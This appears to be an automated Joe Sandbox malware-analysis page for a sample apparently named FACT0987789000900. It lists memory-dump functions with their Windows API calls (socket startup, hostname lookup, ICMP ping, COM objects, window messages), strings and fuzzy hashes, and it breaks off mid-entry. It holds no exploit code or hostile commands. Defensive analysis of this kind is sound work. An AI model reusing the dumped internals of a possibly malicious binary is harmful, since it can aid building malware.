Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 770e28119eb4455babcc8be61aec1e42b5be69fa584280469714386edda2fb27
Instruction ID: 1ee35929ac34adbd3bc830f4722b062bdac1ad17750ba3f8d5b02b63a2ea4d50
Opcode Fuzzy Hash: 770e28119eb4455babcc8be61aec1e42b5be69fa584280469714386edda2fb27
Instruction Fuzzy Hash: 32318F71200218BBDF119FA4DC49FEB3B79FF19364F110215FA19A62A0C739D825EB69

Function 004D6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 004D6F1D
gethostname.WS2_32(?,00000100), ref: 004D6F37
gethostbyname.WS2_32(?), ref: 004D6F44
_wcscpy.LIBCMT ref: 004D6F6C
inet_ntoa.WS2_32(?), ref: 004D6F8A
_strcat.LIBCMT ref: 004D6F98
_wcscpy.LIBCMT ref: 004D6FAF
WSACleanup.WS2_32 ref: 004D6FBD
_wcscpy.LIBCMT ref: 004D6FCB

Strings

0.0.0.0, xrefs: 004D6F66

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: f323f8c1496d6b69d4074fb378367ce131bf6c92450ec8a6d199be65b59eeec5
Instruction ID: ca9ffef7cb9b11049dfcf5ce2faf5fcc73f4c247048d4f6255cef8bee735360f
Opcode Fuzzy Hash: f323f8c1496d6b69d4074fb378367ce131bf6c92450ec8a6d199be65b59eeec5
Instruction Fuzzy Hash: 37112731504114ABDB24AB61EC49EDB77BCEF10714F01406FF005A2281EF789A858B68

Function 004B500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004B5047

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

__gmtime64_s.LIBCMT ref: 004B50E0
__gmtime64_s.LIBCMT ref: 004B5116
__gmtime64_s.LIBCMT ref: 004B5133
__allrem.LIBCMT ref: 004B5189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B51A5
__allrem.LIBCMT ref: 004B51BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B51DA
__allrem.LIBCMT ref: 004B51F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B520F
__invoke_watson.LIBCMT ref: 004B5280

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 8ccd16154d55300ad27b1acfdb04a3967c74b48e05ae0e7f4ff40f1cebd624c3
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 0A71D8B5A01B16ABD714AE79CC41BDBF3A8AF05768F14412FF510D6381E778D9408BE8

Function 004D4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004D4DF8
GetMenuItemInfoW.USER32(00551708,000000FF,00000000,00000030), ref: 004D4E59
SetMenuItemInfoW.USER32(00551708,00000004,00000000,00000030), ref: 004D4E8F
Sleep.KERNEL32(000001F4), ref: 004D4EA1
GetMenuItemCount.USER32(?), ref: 004D4EE5
GetMenuItemID.USER32(?,00000000), ref: 004D4F01
GetMenuItemID.USER32(?,-00000001), ref: 004D4F2B
GetMenuItemID.USER32(?,?), ref: 004D4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004D4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D4FEB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 52f7dcb4d3e11e6c92ad76d32c35c25f341de656ea12d57814c7ae81fbd0b598
Instruction ID: 7a758bd60b8b6f08c487b2efdec8e8a866df10468f6c82fde2845ddcc5f85c33
Opcode Fuzzy Hash: 52f7dcb4d3e11e6c92ad76d32c35c25f341de656ea12d57814c7ae81fbd0b598
Instruction Fuzzy Hash: 02619F71900259AFDB11CFA4D8A8AAF7BB9FB85308F14405FF441A73A1D738AD09DB25

Function 004F9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004F9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004F9C9B
GetWindowLongW.USER32(?,000000F0), ref: 004F9CBF
_memset.LIBCMT ref: 004F9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004F9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004F9D5A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 6cdca0ed9698b61156e4289c01afb7de19db9e761962f6d14a14ba774dc44655
Instruction ID: 7f4ae34a2b93e1915ce38ce26b2d66f10605e10bd6490799219ee2d007ced03b
Opcode Fuzzy Hash: 6cdca0ed9698b61156e4289c01afb7de19db9e761962f6d14a14ba774dc44655
Instruction Fuzzy Hash: EA618B75900208AFDB10DFA8CC81FFE7BB8EB09704F14415AFA05A7291C774AD46DB64

Function 004C94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004C94FE
SafeArrayAllocData.OLEAUT32(?), ref: 004C9549
VariantInit.OLEAUT32(?), ref: 004C955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 004C957B
VariantCopy.OLEAUT32(?,?), ref: 004C95BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 004C95D2
VariantClear.OLEAUT32(?), ref: 004C95E7
SafeArrayDestroyData.OLEAUT32(?), ref: 004C95F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004C95FD
VariantClear.OLEAUT32(?), ref: 004C960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004C961A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bd6ee598fe7294a2abe31374195b840bf75c7489dfcae7f2237d4c2015b3b385
Instruction ID: 282899601bfe053592c08376154e8bc927548dc7654c12edd8ccfa782ca36d67
Opcode Fuzzy Hash: bd6ee598fe7294a2abe31374195b840bf75c7489dfcae7f2237d4c2015b3b385
Instruction Fuzzy Hash: 9E413235A00219BFCF01DFA4D848DDEBB79FF18354F00806AE501A7251DBB5AA45DBA5

Function 004EBB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004EBB5C
VariantInit.OLEAUT32(?), ref: 004EBC2D
VariantInit.OLEAUT32(?), ref: 004EBD2E
VariantClear.OLEAUT32(?), ref: 004EBD38
VariantClear.OLEAUT32(?), ref: 004EBD99

Strings

_NewEnum, xrefs: 004EBB2D
Null Object assignment in FOR..IN loop, xrefs: 004EBBBD, 004EBCEB, 004EBDA7
get__NewEnum, xrefs: 004EBB34
Incorrect Object type in FOR..IN loop, xrefs: 004EBD11

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
API String ID: 2862541840-1765764032
Opcode ID: a1d653fa1f7820996195763dbe031ca62c50d616c0defa802126a9a04e3211e5
Instruction ID: eaea461e68ffc74df774e0655278bc9172103e762815e02e30922047b88316a3
Opcode Fuzzy Hash: a1d653fa1f7820996195763dbe031ca62c50d616c0defa802126a9a04e3211e5
Instruction Fuzzy Hash: EA91AD71A00249ABDF20CFA6CC44FAFBBB8EF85715F10815AF505AB280D7789945CBA4

Function 004EADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

CoInitialize.OLE32 ref: 004EADF6
CoUninitialize.COMBASE ref: 004EAE01
CoCreateInstance.COMBASE(?,00000000,00000017,0051D8FC,?), ref: 004EAE61
IIDFromString.COMBASE(?,?), ref: 004EAED4
VariantInit.OLEAUT32(?), ref: 004EAF6E
VariantClear.OLEAUT32(?), ref: 004EAFCF

Strings

Invalid parameter, xrefs: 004EAEED
NULL Pointer assignment, xrefs: 004EAEA6
Failed to create object, xrefs: 004EAE6C, 004EAF22

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 005389e59ad23ee803bd2aeaa55a78924d059de6917aadf19a971995bae212d1
Instruction ID: ce6c8e44a75250e0314baa4973f021504d04680f1368b74adbb8934c963bd6e7
Opcode Fuzzy Hash: 005389e59ad23ee803bd2aeaa55a78924d059de6917aadf19a971995bae212d1
Instruction Fuzzy Hash: 0961AD70208341AFC710DF5AC849B6BBBE8AF48709F00441EF9859B291C778ED59CB9B

Function 004E8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 004E8168
inet_addr.WS2_32(?), ref: 004E81AD
gethostbyname.WS2_32(?), ref: 004E81B9
IcmpCreateFile.IPHLPAPI ref: 004E81C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004E8237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004E824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004E82C2
WSACleanup.WS2_32 ref: 004E82C8

Strings

Ping, xrefs: 004E81EB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: fdd9e8e046da49150abe260460ad3972d915910c1b54f2a980511b2653a0c210
Instruction ID: 1c9f53a74fc8169db5705072518b8753289a4e2b071fd519ec04d387c03b712e
Opcode Fuzzy Hash: fdd9e8e046da49150abe260460ad3972d915910c1b54f2a980511b2653a0c210
Instruction Fuzzy Hash: 3151C131604700AFDB109F26CC45B6ABBE4EF59315F04886EFA599B3E0DB38E805DB46

Function 004DE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004DE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004DE40C
GetLastError.KERNEL32 ref: 004DE416
SetErrorMode.KERNEL32(00000000,READY), ref: 004DE483

Strings

INVALID, xrefs: 004DE455
READY, xrefs: 004DE45C
NOTREADY, xrefs: 004DE442
READONLY, xrefs: 004DE44E
UNKNOWN, xrefs: 004DE43B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: e757d8c784b1cf8092a5346aafa15313dca08ebc36f883176586ddaf5d89fde5
Instruction ID: 5ab1d84419250db87c792103b87477dff27a3dd4e0082b5b5f48313091d8611d
Opcode Fuzzy Hash: e757d8c784b1cf8092a5346aafa15313dca08ebc36f883176586ddaf5d89fde5
Instruction Fuzzy Hash: E7316335A002099FDB01EB65D995AEEBBB4EF54308F14802BE505AB391D7789D02CB95

Function 004CB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004CB98C
GetDlgCtrlID.USER32 ref: 004CB997
GetParent.USER32 ref: 004CB9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 004CB9B6
GetDlgCtrlID.USER32(?), ref: 004CB9BF
GetParent.USER32(?), ref: 004CB9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 004CB9DE

Strings

ListBox, xrefs: 004CB949
ComboBox, xrefs: 004CB911

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 0bee48826d7a9a3879b665690aee8be39489b21ff180c376988d39503b67e684
Instruction ID: 8059a754a78a23108deb05f647783672326427b632c2fdf7ddd16bb8e102a768
Opcode Fuzzy Hash: 0bee48826d7a9a3879b665690aee8be39489b21ff180c376988d39503b67e684
Instruction Fuzzy Hash: D221C1B8900104BFCF04ABA1CC86EFEBB75EF59304F10411EFA51A32A1DB795819DB64

Function 004CB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004CBA73
GetDlgCtrlID.USER32 ref: 004CBA7E
GetParent.USER32 ref: 004CBA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 004CBA9D
GetDlgCtrlID.USER32(?), ref: 004CBAA6
GetParent.USER32(?), ref: 004CBAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 004CBAC5

Strings

ListBox, xrefs: 004CBA32
ComboBox, xrefs: 004CB9FA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 366915a4d916b03e99962911ccf84dcd0ec101e2c79accc7807f9d8d3659d563
Instruction ID: 3649d93e937383edf0288ecdc43264d77342084cbd143867c7b9b69c4279a6e8
Opcode Fuzzy Hash: 366915a4d916b03e99962911ccf84dcd0ec101e2c79accc7807f9d8d3659d563
Instruction Fuzzy Hash: 9921D3B8900104BFDF01AB61CC86FFEBB75EF48304F00401AF55193291DBBA9819EB64

Function 004CBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004CBAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 004CBAF8
_wcscmp.LIBCMT ref: 004CBB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004CBB85

Strings

largeicons, xrefs: 004CBB19
SHELLDLL_DefView, xrefs: 004CBB04
smallicons, xrefs: 004CBB4D
list, xrefs: 004CBB67
details, xrefs: 004CBB33

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: b380374b46dde2f3997f764707f42299ece643d7a814c3b86360bfb22fcd7da0
Instruction ID: aab62fd677ab108c3cd4f585720d95ab3261ac9ceb0a62f78d53f23fbf104293
Opcode Fuzzy Hash: b380374b46dde2f3997f764707f42299ece643d7a814c3b86360bfb22fcd7da0
Instruction Fuzzy Hash: 5411C87A608312F9FA2466219C07EE7376DDB21328F10401BFD04E54D5FB996C12956C

Function 004EB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004EB2D5
CoInitialize.OLE32(00000000), ref: 004EB302
CoUninitialize.COMBASE ref: 004EB30C
GetRunningObjectTable.OLE32(00000000,?), ref: 004EB40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 004EB539
CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 004EB56D
CoGetObject.OLE32(?,00000000,0051D91C,?), ref: 004EB590
SetErrorMode.KERNEL32(00000000), ref: 004EB5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004EB623
VariantClear.OLEAUT32(0051D91C), ref: 004EB633

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 753157be4ed7c7b91782ba24485489bf359eec2750480c79d87a7bd974294274
Instruction ID: 13ce2b01fce6b54c4a241da90f6dcf7662666fe986f11f3383cb80bc3b5dcf43
Opcode Fuzzy Hash: 753157be4ed7c7b91782ba24485489bf359eec2750480c79d87a7bd974294274
Instruction Fuzzy Hash: E4C12471608341AFC700DF66C88496BBBE9FF88309F00495EF98A9B251DB75ED05CB96

Function 004BACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004BACC1

